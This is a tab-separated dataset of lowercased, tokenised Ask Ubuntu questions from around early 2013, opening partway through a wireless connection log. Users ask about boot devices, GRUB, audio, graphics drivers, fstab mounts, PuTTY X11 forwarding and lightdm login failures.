negotiation completed with 00:14 : bf : dc:74:26 [ ptk=ccmp gtk=tkip ] feb 9 23:58:26 probook wpa_supplicant [ 1159 ] : ctrl-event-connected - connection to 00:14 : bf : dc:74:26 completed ( reauth ) [ id=0 id_str= ] . feb 9 23:58:26 probook networkmanager [ 963 ] : < info > ( eth1 ) : supplicant interface state : 4-way handshake - > completed feb 9 23:58:26 probook networkmanager [ 963 ] : < info > activation ( eth1/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'wireless ' . feb 9 23:58:26 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) scheduled . feb 9 23:58:26 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) started ... feb 9 23:58:26 probook networkmanager [ 963 ] : < info > ( eth1 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] feb 9 23:58:26 probook networkmanager [ 963 ] : < info > activation ( eth1 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) feb 9 23:58:26 probook networkmanager [ 963 ] : < info > dhclient started with pid 2897 feb 9 23:58:26 probook networkmanager [ 963 ] : < info > activation ( eth1 ) beginning ip6 addrconf . feb 9 23:58:26 probook dhclient : internet systems consortium dhcp client 4.1-esv-r4 feb 9 23:58:26 probook dhclient : copyright 2004-2011 internet systems consortium . feb 9 23:58:26 probook dhclient : all rights reserved . feb 9 23:58:26 probook dhclient : for info , please visit https : //www.isc.org/software/dhcp/ feb 9 23:58:26 probook dhclient : feb 9 23:58:26 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) complete . feb 9 23:58:26 probook networkmanager [ 963 ] : < info > ( eth1 ) : dhcpv4 state changed nbi - > preinit feb 9 23:58:26 probook dhclient : listening on lpf/eth1/ac:81:12:7a : e7:15 feb 9 23:58:26 probook dhclient : sending on lpf/eth1/ac:81:12:7a : e7:15 feb 9 23:58:26 probook dhclient : sending on socket/fallback feb 9 23:58:26 probook dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 3 feb 9 23:58:27 probook kernel : [ 532.100792 ] net_ratelimit : 2 callbacks suppressed feb 9 23:58:27 probook kernel : [ 532.100800 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) feb 9 23:58:27 probook kernel : [ 532.100808 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) feb 9 23:58:27 probook kernel : [ 532.100902 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) feb 9 23:58:27 probook kernel : [ 532.100908 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) feb 9 23:58:27 probook kernel : [ 532.175977 ] userif-2 : sent link down event .
253275	how do i change the device on which ubuntu boots ?	i have a laptop with an internal ssd ( let 's call it samsung-ssd ) , and i would like to install ununtu 12.04 on an external ssd connected via usb3 ( let 's call this one vertex2 ) . i downloaded an ubuntu iso and created a bootable usb key from it . then i booted on the usb key , and followed the ubuntu install : /dev/sda is the internal samsung-ssd . /dev/sdb is the usb key from which i am installing /dev/sdc is the external vertex2 on which i am installing . the install completes , i boot ubuntu this time from the vertex2 . but as the usb key is not here anymore , the vertex2 is known as /dev/sdb . ubuntu tried to boot on /dev/sdc and fails , because /dev/sdc does not exist . so a busybox terminal shows up , with the message gave up waiting for root device . common problems ... in this terminal , i can do the following : # only vertex2 is plugged > ls /dev | grep sd /dev/sda # samsung ssd /dev/sda1 /dev/sda2 /dev/sdb # vertex2 # removing vertex2 > ls /dev | grep sd /dev/sda # samsung ssd /dev/sda1 /dev/sda2 # pluging usb > ls /dev | grep sd /dev/sda # samsung ssd /dev/sda1 /dev/sda2 /dev/sdb # usb stick # pluging vertex2 in addition to usb stick > ls /dev | grep sd /dev/sda # samsung ssd /dev/sda1 /dev/sda2 /dev/sdb # usb stick /dev/sdc # vertex2 now the vertex2 is know as /dev/sdc ( as during the the install ) . > exit # this command tries to resume the boot process and this way i can boot on ubuntu . so my question is : how do i configure ubuntu so that it tries to boot on /dev/sdb instead of /dev/sdc ? can i achieve that with mount and chroot ? edit : my fstab : # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sdc2 during installation uuid=2586eee0-5f24-462b-b44d-5c9a25aebe6c / ext2 errors=remount-ro 0 1 # swap was on /dev/sdc5 during installation uuid=56498034-3361-4d7d-ae7f-dc8e69b582ed none swap sw 0 0 what i do n't understand is that in my fstab , the vertex2 is known by it 's uuid . so it should n't matter if it appears as sdb or sdc . and yet i am able to boot only when it appears as sdc ... i tried to replace the vertex uuid by sdb in the fstab , and it did n't help . it 's like some other file is used to mount drives on boot . edit 2 : in the boot menu , i can edit entries . if i edit the ubuntu entry ( by pressing e ) , i see this text : recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd2 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd2 , msdos2 -- hint-efi=hd2 , msdos2 -- hint-baremetal=ahci2 , msdos2 25\ 86eee0-5f24-462b-b44d-5c9a25aebe6c else search -- no-floppy -- fs-uuid -- set=root 2586eee0-5f24-462b-b44d-5c9a25aebe6c fi linux /boot/vmlinuz-3.5.0-17-generic root=/dev/sdc2 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-17-generic if i change sdc2 to sdb2 , and press f10 to resume boot , ubuntu boots sucessfully ( no busybox prompt ) . this text is located in /boot/grub/grub.cfg . but i should not edit it directly . it has this header : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # i see no /dev/sdc2 in the grub config : > sudo grep -r `` sdc2 '' /etc/grub.d/ > # no results where sdc2 comes from ? how do i change it permanently to sdb2 ? ( the change in the boot menu is only temporary . )
253277	kubuntu microphone volume level keeps going down	i 'm using kde and am using skype and a java program ( runescape client ) at the same time . i have the mixer open and the volume of my mic keeps going down automatically . i really have no idea what is going on ... is there any way i can fix this ?
253278	sound not working until manually enabled/disabled	alright , so i 'm running xubuntu 12.10 , and whenever i close the lid to my laptop , or turn it off , i have to go into my sound settings- > configuration- > then manually switch it from analog stereo , to a different profile , then change it back . the input seems to be completely random , sometimes i will switch it on and off once and it will work , other times i 've had to do it upwards or four times , so there 's no pattern that i 've seen . a couple other things to note , the bars ( sorry , i do n't know the actual name ) indicating that sound should be playing is going , indicating that there should be sound , when in fact there is n't . the volume is up , and switching sound profiles is the only work around that i 've been able to come up with . also , my volume/mute buttons on my keyboard are n't working . the gui indicator will go off , but the sound wo n't actually change . i have n't been able to find a temporary fix to this , but it does n't bother me much , i just thought it was worth mentioning . thanks in advance !
253284	how does ubuntu boot ?	i am new to ubuntu . what are the steps during the boot process of ubuntu ? more specifically : what is a boot loader ? how are drives mounted ? how does your system know which drive to use ? what are the important config files ? ( what is /etc/fstab )
253285	nvidia gt430 hdmi/hdtv - no input after selecting ubuntu from grub	i likely formatted the title horribly , but this is my issue ; i 'm using an nvidia gt430 with an hdmi cable to my tv , and when i try to boot up ubuntu ( 12.10 ) after just installing it , it will not display anything , i.e . `` no input . '' i can run the other options from the grub and windows 7 works from it , and i have it on two hard drives : windows 7 is installed on c : or /dev/sdb , and ubuntu is installed on /dev/sda , and they 're both two different drives . i know that it needs drivers , of course , but i 'm not sure if i can install them using a command line , is there any way to do that ? if so , can anyone help me out with the commands i 'd need , since i am completely new to linux . thanks in advance .
253288	how can i access files created in windows ?	i downloaded ubuntu but no matter what i do i ca n't access my ms files . how do i access them ?
253292	installing flash on ubuntu	i have an ec2 instance running ubuntu 12.10 and i 'd like to install flash player on it . however , when i try to install it as follows , i 'm unable to . some hint on how i could proceed ? thanks . $ sudo apt-get install flashplugin-installer reading package lists ... done building dependency tree reading state information ... done package flashplugin-installer is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'flashplugin-installer ' has no installation candidate i have n't set up vnc yet , so i 'd very much prefer a cli solution for the same .
253295	unable to open update manager or ubuntu tweak	i can not open update manager and ubuntu tweak when i open ubuntu tweak i get this log user @ laptop : ~ $ ubuntu-tweak traceback ( most recent call last ) : file `` /usr/bin/ubuntu-tweak '' , line 124 , in < module > from ubuntutweak.main import ubuntutweakwindow file `` /usr/lib/python2.7/dist-packages/ubuntutweak/main.py '' , line 32 , in < module > from ubuntutweak.apps import appspage file `` /usr/lib/python2.7/dist-packages/ubuntutweak/apps/__init__.py '' , line 9 , in < module > from aptsources.sourceslist import sourceslist file `` /usr/lib/python2.7/dist-packages/aptsources/__init__.py '' , line 4 , in < module > apt_pkg.init ( ) systemerror : e : opening configuration file /etc/apt/apt.conf.d/00aptitude - ifstream : :ifstream ( 13 : permission denied ) error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 4 , in < module > from apport.report import report file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 30 , in < module > import apport.fileutils file `` /usr/lib/python2.7/dist-packages/apport/fileutils.py '' , line 23 , in < module > from apport.packaging_impl import impl as packaging file `` /usr/lib/python2.7/dist-packages/apport/packaging_impl.py '' , line 20 , in < module > import apt file `` /usr/lib/python2.7/dist-packages/apt/__init__.py '' , line 35 , in < module > apt_pkg.init ( ) systemerror : e : opening configuration file /etc/apt/apt.conf.d/00aptitude - ifstream : :ifstream ( 13 : permission denied ) original exception was : traceback ( most recent call last ) : file `` /usr/bin/ubuntu-tweak '' , line 124 , in < module > from ubuntutweak.main import ubuntutweakwindow file `` /usr/lib/python2.7/dist-packages/ubuntutweak/main.py '' , line 32 , in < module > from ubuntutweak.apps import appspage file `` /usr/lib/python2.7/dist-packages/ubuntutweak/apps/__init__.py '' , line 9 , in < module > from aptsources.sourceslist import sourceslist file `` /usr/lib/python2.7/dist-packages/aptsources/__init__.py '' , line 4 , in < module > apt_pkg.init ( ) systemerror : e : opening configuration file /etc/apt/apt.conf.d/00aptitude - ifstream : :ifstream ( 13 : permission denied ) and when i open update manager i get this user @ laptop : ~ $ update-manager traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 37 , in < module > from updatemanager.updatemanager import updatemanager file `` /usr/lib/python3/dist-packages/updatemanager/updatemanager.py '' , line 52 , in < module > from .installprogress import installprogress file `` /usr/lib/python3/dist-packages/updatemanager/installprogress.py '' , line 42 , in < module > from .core.utils import ( inhibit_sleep , file `` /usr/lib/python3/dist-packages/updatemanager/core/utils.py '' , line 31 , in < module > apt_pkg.init_config ( ) systemerror : e : opening configuration file /etc/apt/apt.conf.d/00aptitude - ifstream : :ifstream ( 13 : permission denied ) error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 4 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 30 , in < module > import apport.fileutils file `` /usr/lib/python3/dist-packages/apport/fileutils.py '' , line 23 , in < module > from apport.packaging_impl import impl as packaging file `` /usr/lib/python3/dist-packages/apport/packaging_impl.py '' , line 20 , in < module > import apt file `` /usr/lib/python3/dist-packages/apt/__init__.py '' , line 35 , in < module > apt_pkg.init ( ) systemerror : e : opening configuration file /etc/apt/apt.conf.d/00aptitude - ifstream : :ifstream ( 13 : permission denied ) original exception was : traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 37 , in < module > from updatemanager.updatemanager import updatemanager file `` /usr/lib/python3/dist-packages/updatemanager/updatemanager.py '' , line 52 , in < module > from .installprogress import installprogress file `` /usr/lib/python3/dist-packages/updatemanager/installprogress.py '' , line 42 , in < module > from .core.utils import ( inhibit_sleep , file `` /usr/lib/python3/dist-packages/updatemanager/core/utils.py '' , line 31 , in < module > apt_pkg.init_config ( ) systemerror : e : opening configuration file /etc/apt/apt.conf.d/00aptitude - ifstream : :ifstream ( 13 : permission denied ) it has been happening after i wiped my entire ubuntu root and used my previous existing home partition . there is an icon of update notification which i can not seem to use because none of the options can be clicked . further , this icon does not stop showing even after updating from command line .
253302	failsafex mode hangs : how to debug it ?	i have radeon/intel hybrid graphics . when testing my recovery mode login , failsafex mode hangs at the second screen . it needs a mouse or not ? looks like there are buttons i could click . i have a laptop . connecting a usb wired mouse does n't give me a cursor . and the keys do n't select up or down anything . what system messages could i search to find out what 's happening ? my system is working , just want to make sure recover mode in graphics will work , when and if i need it .
253304	lost my files ? i 've installed ubuntu wrong	i wanted to do a dual boot with windows 8 and ubuntu 12.10 . i followed this tutorial : http : //www.youtube.com/watch ? v=wncsbtyuzom when i was on the installing ubuntu part , the free space was not showing , it was showing as unusable . so i clicked on my c drive on the installation screen and pressed the - button to remove the partition i created and just created the swap space on the c drive and installed ubunto on the c drive choosing to use 50gb . so i installed , rebooted and can no longer run windows 8 , where all my files are accessible . i 'm not just talking movies , tv shows galore that i have not watched . i 'm talking about all the music i 've collected over 3 years and all my pictures and important documents . i know i should have a backup , but i do n't so that 's that . now , can i do anything to access these files at all on ubuntu , because i can not find this 'host ' folder containing my windows 8 user where all my files are . thanks for your time , i hope i ai n't buggered this up !
253305	most suitable permissions for mounted internal disk shared with windows ?	i 've been using ubuntu/linux for a few years now but i 'm still learning.. i 've just updated to 12.10 after installing a samsung 830 128gb ssd which has windows and ubuntu os 's dualboot on it . my old 500gb hdd ( data ) is now ntfs with all my data on it ( music , docs , videos etc ) and i 'd like to have this accessible/shareable in both os 's . i 've decided to leave /home on my ssd but symlink to the data drive . before i do this i want to make sure data automounts at startup ( for dropbox most importantly ) . if i edit my /etc/fstab/ to include : # data shared with windows uuid=blablabla /media/kim/data ntfs-3g defaults , auto , uid=1000 , gid=1000 , umask=077 0 0 i get these permissions : drwx -- -- -- 1 kim kim 4.0k feb 4 23:31 data/ this is the same when i mount the disk during a session by clicking on the disk in unity . but ! if i look at the permissions of my documents when i `` automount '' it via fstab everything is executable : -rwx -- -- -- 2 kim kim 13k apr 25 2010 the best of the best.doc* i really want it to have the same permissions as when ubuntu does the mounting : -rw -- -- -- - 2 kim kim 13k apr 25 2010 the best of the best.doc of course , i still want my videos to be executable right ? so what are the correct permissions i should be using to do this ( in my fstab ) ? is there a way to find out what permissions ubuntu gives the disk when it mounts so i can emulate them in my fstab ? thanks in advance for any help . ; )
253306	freemind not opening in ubuntu 12.04	i am a beginner in ubuntu and mine is ubuntu 12.04 while trying to run freemind i am getting the message sruthin @ sruthin-1015cx : ~ $ freemind /usr/bin/freemind : 228 : /usr/bin/freemind : /opt/java/32/jre1.6.0_30//bin/java : not found and my java version is sruthin @ sruthin-1015cx : ~ $ java -version java version `` 1.7.0_13 '' java ( tm ) se runtime environment ( build 1.7.0_13-b20 ) java hotspot ( tm ) client vm ( build 23.7-b01 , mixed mode ) please help .
253310	is it possible to have two virtual consoles open in a single screen ?	when using virtual consoles , is it possible to have two different virtual consoles open at the same time and sharing the screen space and being able to use either ?
253311	wrong use of # mv	i 've a done wrong use of sudo mv command . example : sudo mv/home/user/downloads/piff.pdf /root/pdfs then the directory /root/pdfs has been changed to a plain text file . i can undo the command ? i can retrieve the directory ?
253317	problem with hp mini 1104 wifi card in ubuntu 12.04	i have a hp mini 1104 with windows 7 installed by default . when i install ubuntu 12.04 and try to activate the proprietary drivers , i only see the graphics card . when you connect to the wifi wireless card is turned off and intermittently , if it detects networks but does not have a stable connection . my network card is a ralink rt3593 does anyone know the solution to my problem ?
253327	unable to dual boot windows 7,8 , and ubuntu using w8 bootloader	i had a sony vaio running windows 7 and ubuntu but i had given it to my friend as he needed it , i bought a new desktop with windows 7 and windows 8 dual booted using w8 boot loader , now i am trying to boot ubuntu but i want to boot it from windows 8 boot loader can anyone please help so i can boot all 3 oses from same boot screen.please help , thank you .
253329	ubuntu one storage options	i am looking at purchasing a ubuntu one storage account , and all i can find is a 20gb storage option . i will primarily use this cloud service for storing my family photo albums , and will need approx . 47gb to store my current library , not including more space for more pictures as it is continually growing . is there a way to purchase more then 20gb ? and if so , how do i go about doing this ? thanks so much ! ! ! : - )
253334	ubuntu software center not opening in 12.10	i am trying to open ubuntu software center using the command line by typing software-center and i get the following 2013-02-10 12:09:54,006 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-02-10 12:09:54,013 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-02-10 12:09:54,115 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2013-02-10 12:09:54,115 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 337 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in __init__ self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 139 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 75 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 what should be done ? i tried to open it otherwise but with no results .
253336	i am getting a putty attempted incorrect protocol errors when i ssh into my server from windows	i have had putty connecting via ssh to my ubuntu 12.10 server for several months . yesterday i began to get the following error every time i connect : putty x11 proxy : wrong authentication protocol attempted i can do everything in the session except launch x windows applications . to my knowledge nothing changed on the windows side , and i did recently install @ 20 updates on the ubuntu side during normal upgrade maintenance . i use xming as an x server on the windows client . and as i said it was working just fine . i have ready dozens of google results searching on this error and most seem to involve the error happening after an ssh connection while attempting to su or sudo to another account , but this is happening to my regular user connection . i have tried deleting the .xauthority file in my home directory , also various xauth add commands to try and get the correct `` magic cookie '' back into the .xauthority file . nothing has worked . any thoughts ?
253337	how to remove title bar and borders on maximized windows in kubuntu ?	in gnome-shell there is an extension that removes the window borders and close buttons and title bar etc on maximized windows to save screen real estate . i 'm sure kwin / kde has a way to mimic this behavior ?
253350	small harddrive for ubuntu , large harddrive for music , video , pictures etc ?	i have a small ssd for running the operating system ( ubuntu 12.04 lts , it used to windows but recently made the switch ! ) . i then use another large harddrive for storing all my data ( i call it `` 11111 '' , it shows up under `` devices '' in the file explorer , with the option to unmount it ) . question 1 : is there anyway i can make the default `` documents '' , `` pictures '' , `` videos '' , `` music '' links refer to a location of my large `` 11111 '' drive instead of a location on my small ssd ? question 2 : should i incorporate my `` 11111 '' drive into the file system somehow instead ? however i dont want my media spread on the two drives , i would like to keep the os and media on separate independent drives . question 3 : any good tutorials or links on how to do question 2 . i have been googling it but not coming right . question 4 : i would like to make dropbox and ubuntuone point to locations on `` 11111 '' drive instead of on the `` file system '' . anyone know how to do this ? any advice , guidance , or links to help me with the above will be highly appreciated .
253355	ubuntu hdd not correct size	i am running ubuntu 12.04 64bit . i used the dd command to clone my 80gb drive ( filesystem ) to a clean 500gb . it worked flawlessly . afterwards , i took out the 80gb and replaced it with the new 500gb . it boots up perfectly and the entire filesystem is as it was . however , when i right click inside a directory and click properties or when i tupe df -h , it shows that there is only 10gb free space . howrver , in the disk utility it shows the 500gb as the filesystem and nothing seems wrong . how can i make ubuntu see that there is more than just 10gb free space on the new hdd ? edit : here is the result i get in gparted and then also the contradictory result when right clicking in a directory and selecting properties :
253361	backup recovery partition of windows 8 in gpt	my friend have acer laptop which had windows 8 pre installed and a recovery partition ( sda 7 ) . he want to use only windows 8 but wants to make a backup of his recovery partition ( sda 7 ) since `` recovery is the only way to install win 8 because its product key is in bios '' ( told by cusomer care person ) . his drive is gpt . i want to know how to back up sda7 and restore in case of drive failure or something else . edit booting in uefi
253364	geforce 7900 gs drivers	first i had this problem , i could n't get the login screen it brought me to tty so i installed other drivers and did apt-get -f install and now i can get to ubuntu but its very slow and games lag alot right at the menu . the driver is nvidia-experimental-304 . now i want to install an older driver that will work good . can anyone help ? thanks edit : when i try to install nvidia-current-updates it says this admin @ blackhat : ~ $ sudo apt-get install nvidia-current-updates reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-current-updates : depends : xorg-video-abi-11 recommends : nvidia-settings-updates e : unable to correct problems , you have held broken packages .
253365	can i use ubuntu with windows 7 starter ?	i 've tried downloading ubuntu 12.10 once before , but was unable to for some unknown reason . i only have windows 7 starter edition- could that be the problem ?
253366	ubuntu not booting from usb	so today my hard drive on my desktop decided to fail ... i am trying to launch ubuntu via usb flash drive and i am getting several errors , i used the universal usb installer to get ubuntu 12.10 desktop amd64 iso onto the usb , i prioritized it to launch from the usb and once it does i get a screen saying boot : if i press enter the message will appear as : initial menu has no label entries it then quickly disappears . i tried using ubuntu 12.4 iso however it had a different error , where it says : unknown keyword in configuration file : niciar & unknown keyword in configuration file : ubuntu & no default or ui configuration directive found please i have no idea what to do , i 've searched but i could n't find a solution to this problem . one result i found said : open the the syslinux folder in the root of the flash drive . inside is a file called syslinux.cfg you’ll want to edit that . find the line “ui gfxboot bootlogo” and simply remove the “ui “ . save and try booting again . i opened the cfg file in notepad , and some spanish writing came up , i 'm not sure if that is the problem ... any help would be appreciated , thank you !
253372	ubuntu runs terribly slow on my desktop	i have a ubuntu 12.10 partition on my secondary ssd , while the bootloader and windows 7 partition are one another ssd . my desktop is a gaming rig running an intel i5 3570k , ati radeon hd 7870 oc , 8gb of ddr3 ram , gigabyte z77x-up5-th , etc . i ran the software updater and checked the video card drivers and tried different ones but no luck . if anyone could help me that would be great ! thanks !
253376	lightdm : `` failed during authentication ''	after entering login info in lightdm , screen blacks out for a second and returns back to the login screen again . however , i 'm able to login through tty and gdm without any problem . as the log file at /var/log/lightdm/lightdm.log says , the problem is `` authentication failure '' but i ca n't figure out how to solve it . [ +0.01s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.01s ] debug : starting light display manager 1.4.0 , uid=0 pid=2279 [ +0.01s ] debug : loaded configuration from /etc/lightdm/lightdm.conf [ +0.01s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.02s ] debug : registered seat module xlocal [ +0.03s ] debug : registered seat module xremote [ +0.03s ] debug : adding default seat [ +0.03s ] debug : starting seat [ +0.03s ] debug : starting new display for greeter [ +0.03s ] debug : starting local x display [ +0.03s ] debug : using vt 7 [ +0.03s ] debug : activating vt 7 [ +0.03s ] debug : logging to /var/log/lightdm/x-0.log [ +0.03s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +0.03s ] debug : launching x server [ +0.03s ] debug : launching process 2287 : /usr/bin/x :0 -core -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +0.03s ] debug : waiting for ready signal from x server :0 [ +0.03s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.03s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +0.18s ] debug : got signal 10 from process 2287 [ +0.18s ] debug : got signal from x server :0 [ +0.18s ] debug : connecting to xserver :0 [ +0.18s ] debug : starting greeter [ +0.18s ] debug : started session 2291 with service 'lightdm-greeter ' , username 'lightdm' [ +0.22s ] debug : session 2291 authentication complete with return value 0 : success [ +0.22s ] debug : greeter authorized [ +0.22s ] debug : logging to /var/log/lightdm/x-0-greeter.log [ +0.25s ] debug : session 2291 running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/unity-greeter [ +0.65s ] debug : greeter connected version=1.4.0 [ +0.65s ] debug : greeter connected , display is ready [ +0.65s ] debug : new display ready , switching to it [ +0.65s ] debug : activating vt 7 [ +3.16s ] debug : greeter start authentication for amir [ +3.16s ] debug : started session 2383 with service 'lightdm ' , username 'amir' [ +3.26s ] debug : greeter start authentication for amir [ +3.26s ] debug : session 2383 : sending sigterm [ +3.26s ] debug : started session 2385 with service 'lightdm ' , username 'amir' [ +3.26s ] debug : session 2383 terminated with signal 15 [ +3.26s ] debug : session 2383 failed during authentication [ +3.27s ] debug : session 2385 got 1 message ( s ) from pam [ +3.27s ] debug : prompt greeter with 1 message ( s ) [ +8.48s ] debug : continue authentication [ +8.50s ] debug : session 2385 authentication complete with return value 0 : success [ +8.50s ] debug : authenticate result for user amir : success [ +8.51s ] debug : user amir authorized [ +8.52s ] debug : greeter requests session xubuntu [ +8.52s ] debug : using session xubuntu [ +8.52s ] debug : stopping greeter [ +8.52s ] debug : session 2291 : sending sigterm [ +8.76s ] debug : session 2291 exited with return value 0 [ +8.76s ] debug : greeter quit [ +8.77s ] debug : dropping privileges to uid 1000 [ +8.77s ] debug : calling setresgid [ +8.77s ] debug : calling setresuid [ +8.86s ] debug : restoring privileges [ +8.86s ] debug : calling setresuid [ +8.86s ] debug : calling setresgid [ +8.87s ] debug : dropping privileges to uid 1000 [ +8.87s ] debug : calling setresgid [ +8.87s ] debug : calling setresuid [ +8.87s ] debug : writing /home/amir/.dmrc [ +9.07s ] debug : restoring privileges [ +9.07s ] debug : calling setresuid [ +9.07s ] debug : calling setresgid [ +9.28s ] debug : starting session xubuntu as user amir [ +9.28s ] debug : session 2385 running command /usr/sbin/lightdm-session startxfce4 [ +9.29s ] debug : registering session with bus path /org/freedesktop/displaymanager/session0 [ +9.40s ] debug : session 2385 exited with return value 1 [ +9.40s ] debug : user session quit [ +9.40s ] debug : stopping display [ +9.40s ] debug : sending signal 15 to process 2287 [ +10.19s ] debug : process 2287 exited with return value 0 [ +10.19s ] debug : x server stopped [ +10.19s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +10.19s ] debug : releasing vt 7 [ +10.19s ] debug : display server stopped [ +10.19s ] debug : display stopped [ +10.19s ] debug : active display stopped , switching to greeter [ +10.19s ] debug : switching to greeter [ +10.19s ] debug : starting new display for greeter [ +10.19s ] debug : starting local x display [ +10.19s ] debug : using vt 7 [ +10.19s ] debug : logging to /var/log/lightdm/x-0.log [ +10.19s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +10.19s ] debug : launching x server [ +10.19s ] debug : launching process 2494 : /usr/bin/x :0 -core -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +10.19s ] debug : waiting for ready signal from x server :0 [ +10.34s ] debug : got signal 10 from process 2494 [ +10.34s ] debug : got signal from x server :0 [ +10.34s ] debug : connecting to xserver :0 [ +10.34s ] debug : starting greeter [ +10.34s ] debug : started session 2497 with service 'lightdm-greeter ' , username 'lightdm' [ +10.36s ] debug : session 2497 authentication complete with return value 0 : success [ +10.36s ] debug : greeter authorized [ +10.36s ] debug : logging to /var/log/lightdm/x-0-greeter.log [ +10.36s ] debug : session 2497 running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/unity-greeter [ +10.63s ] debug : greeter connected version=1.4.0 [ +10.63s ] debug : greeter connected , display is ready [ +10.63s ] debug : new display ready , switching to it [ +10.63s ] debug : activating vt 7 [ +10.63s ] debug : stopping greeter display being switched from [ +10.92s ] debug : greeter start authentication for amir [ +10.92s ] debug : started session 2582 with service 'lightdm ' , username 'amir' [ +10.92s ] debug : session 2582 got 1 message ( s ) from pam [ +10.92s ] debug : prompt greeter with 1 message ( s ) [ +11.20s ] debug : greeter start authentication for amir [ +11.20s ] debug : session 2582 : sending sigterm [ +11.20s ] debug : started session 2584 with service 'lightdm ' , username 'amir' [ +11.20s ] debug : session 2582 terminated with signal 15 [ +11.20s ] debug : session 2582 failed during authentication [ +11.21s ] debug : session 2584 got 1 message ( s ) from pam [ +11.21s ] debug : prompt greeter with 1 message ( s ) [ +14.61s ] debug : greeter closed communication channel [ +59.09s ] debug : continue authentication [ +59.11s ] debug : got signal 15 from process 1 [ +59.11s ] debug : caught terminated signal , shutting down [ +59.11s ] debug : stopping display manager [ +59.11s ] debug : stopping seat [ +59.11s ] debug : stopping display [ +59.11s ] debug : session 2497 : sending sigterm [ +59.11s ] debug : session 2584 terminated with signal 15 [ +59.11s ] debug : session 2584 failed during authentication [ +59.11s ] debug : authenticate result for user amir : authentication stopped before completion [ +59.23s ] debug : greeter closed communication channel [ +59.23s ] debug : session 2497 exited with return value 0 [ +59.23s ] debug : greeter quit [ +59.23s ] debug : sending signal 15 to process 2494 [ +59.25s ] debug : process 2494 exited with return value 0 [ +59.25s ] debug : x server stopped [ +59.25s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +59.25s ] debug : releasing vt 7 [ +59.25s ] debug : display server stopped [ +59.25s ] debug : display stopped [ +59.25s ] debug : seat stopped [ +59.25s ] debug : display manager stopped [ +59.25s ] debug : stopping daemon [ +59.25s ] debug : exiting with return value 0
